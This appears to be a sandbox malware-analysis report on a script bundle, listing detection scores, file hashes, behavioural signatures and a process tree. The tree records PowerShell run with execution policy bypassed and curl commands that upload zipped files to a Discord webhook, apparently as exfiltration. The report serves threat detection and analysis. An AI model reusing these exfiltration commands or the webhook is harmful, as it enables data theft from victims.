Overview
overview
10Static
static
10i965652f-m...ta.exe
windows7-x64
1i965652f-m...ta.exe
windows10-2004-x64
7i965652f-main/e.ps1
windows7-x64
3i965652f-main/e.ps1
windows10-2004-x64
3i965652f-m...de.ps1
windows7-x64
3i965652f-m...de.ps1
windows10-2004-x64
8i965652f-m...le.bat
windows7-x64
8i965652f-m...le.bat
windows10-2004-x64
8i965652f-m...ab.ps1
windows7-x64
3i965652f-m...ab.ps1
windows10-2004-x64
8i965652f-main/m.ps1
windows7-x64
8i965652f-main/m.ps1
windows10-2004-x64
8i965652f-m...st.vbs
windows7-x64
3i965652f-m...st.vbs
windows10-2004-x64
8Analysis
-
max time kernel
93s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-01-2025 06:15
Behavioral task
behavioral1
Sample
i965652f-main/bdata.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
i965652f-main/bdata.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
i965652f-main/e.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
i965652f-main/e.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
i965652f-main/exclude.ps1
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
i965652f-main/exclude.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
i965652f-main/file.bat
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
i965652f-main/file.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
i965652f-main/grab.ps1
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
i965652f-main/grab.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
i965652f-main/m.ps1
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
i965652f-main/m.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
i965652f-main/svhost.vbs
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
i965652f-main/svhost.vbs
Resource
win10v2004-20241007-en
General
-
Target
i965652f-main/grab.ps1
-
Size
1KB
-
MD5
bf95bc51a62fc80294a7088fc5551bfc
-
SHA1
54b4805f6a1fa45179d4b8c0ef5e01f0528e11fd
-
SHA256
b245958d5d98d1450d65b8848ba1618e81d85c0012530796f61b0b9e107eeb6b
-
SHA512
b57e27a7ade7fcb79dfbe5bb3d562fab9fc0f4388696681e2b95c9c554ca00bcdd15e93f035b18e386cd0773bf2ccc72a747abf0b23ad176b8a935d220e8556d
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 3828 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 35 discord.com 40 discord.com 43 discord.com 4 discord.com 14 discord.com 30 discord.com 31 discord.com 41 discord.com 3 discord.com -
pid Process 3828 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3828 powershell.exe 3828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3828 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3828 wrote to memory of 1908 3828 powershell.exe 84 PID 3828 wrote to memory of 1908 3828 powershell.exe 84 PID 3828 wrote to memory of 404 3828 powershell.exe 101 PID 3828 wrote to memory of 404 3828 powershell.exe 101 PID 3828 wrote to memory of 4320 3828 powershell.exe 103 PID 3828 wrote to memory of 4320 3828 powershell.exe 103 PID 3828 wrote to memory of 4412 3828 powershell.exe 105 PID 3828 wrote to memory of 4412 3828 powershell.exe 105 PID 3828 wrote to memory of 4952 3828 powershell.exe 107 PID 3828 wrote to memory of 4952 3828 powershell.exe 107 PID 3828 wrote to memory of 1292 3828 powershell.exe 109 PID 3828 wrote to memory of 1292 3828 powershell.exe 109 PID 3828 wrote to memory of 4040 3828 powershell.exe 111 PID 3828 wrote to memory of 4040 3828 powershell.exe 111
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:1908
-
-
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\e.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:404
-
-
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\exclude.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:4320
-
-
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\file.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:4412
-
-
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\grab.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:4952
-
-
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\m.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:1292
-
-
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\svhost.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n2⤵PID:4040
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8.2MB
MD5e38d77d89d87d9dc6975a8c52049ba18
SHA16aee028ef6d2327233466e51dd4c293a28cd43c4
SHA256658991e9ec65890494a0e7051d41f79f2c7fbba978e64cf577c552d1089f295d
SHA512ebfaaac981a1189864503526de626ae49de3ded78ab464c31fc441e866e894aca10817c7c96a35ee5d113dfc7aaf3ef619205abe9a4b1fafeb1c2ed9e85bf637
-
Filesize
918B
MD59a8e90d4abda1500466b8970c6a36982
SHA1057b038c0a91654f5a51e45deb94247e0d7c5e3d
SHA256214b9a2f9f18be94fb5ce10b3e4007099d56df2a9978a2175af9fd98c375b7e2
SHA512abe05046effb8903a2dcf711ce302a26967e7fa34b9c9488bebaf1aafe0842745488e84417987ab4f2aaffbde8e2dddb4f6116f23124cb5bcfcf3c9c376c1a7e
-
Filesize
650B
MD5f868c684d24aa6e8c3a1451e00016900
SHA1b7c2370e5d4d886df82456708d9e9b6553939286
SHA256ea0301e41e0222f736260bebcdf5250fdd6283854837a6c3356221b554e96244
SHA512a83e08de2506c61af0fe933265273f05164bcc30e90500c09b518e6b9238330d0cf2db21915b4f4bb0c09f50f41e6b3fcc73a3d883aaa42f4dc60ac4926faa43
-
Filesize
350B
MD57ed554c7a827ba84c1d340fe966a2db9
SHA1ca39dd825b902a3c853d170312b89a3198e0d67f
SHA2566d06797176b04baf550c01724281cc1d1ab5b40d18314c00eb3ae767775ca99c
SHA5120490283cba37a2c2cda88976ada55b81a967c6ccd5373445007f7c72f96205cd33bf54341ab298a077a947da8f4d66c387dc0e1ef0ada99505aac40e66d5187d
-
Filesize
857B
MD50632e6262f80957d689873cd171ef4eb
SHA159ebd357f65af9b6923c93f4a5d2ab959f674ca9
SHA2565384b0d039f2a3c0a2d0c76aaea6f02f53af13f10d1b059932fbfd686e72f84e
SHA51254b7e19fb935fc55f2be6ceb6bbe6205f51c299406db83cd9e14472c89f6be0ff33ab1a217c203d3d873b9d0392c09b8fec7f92012d2a91446998b8ab6b0fb69
-
Filesize
5KB
MD53e9da8af20794b88518123e7726a1090
SHA1d41b522d24cb6d0860702d0fd89b12ec6bcbe056
SHA256c984bc8481dc293ba634a76b05f875feda1adaf346fb5d977ff12d6f284443d6
SHA512862021501b0af52bc31f1f71d1136eb6dc586f425a586c5e7b3af433d34b3cc7bbfcc5e4e12f0526c4652f972d12518d59075285c40ca968b9930fb74ceefe42
-
Filesize
722B
MD52b554843f7216d4fc3966daf6a8d113e
SHA1ee38847558c8d215357c512d952a3081dd582aea
SHA25666d56f48c653b00867af782c7fa90e33213270f2c54b9eeb744058fe2f54e17f
SHA512f258ef8eb692a7e21ab64cfe80f0e27f82706cbbf97d1aeec3b6fbd34855d9b76ba6fb1796c4e9265e7f5e25aa55c1b6026e369a00aebaeab49eec8d5ff57328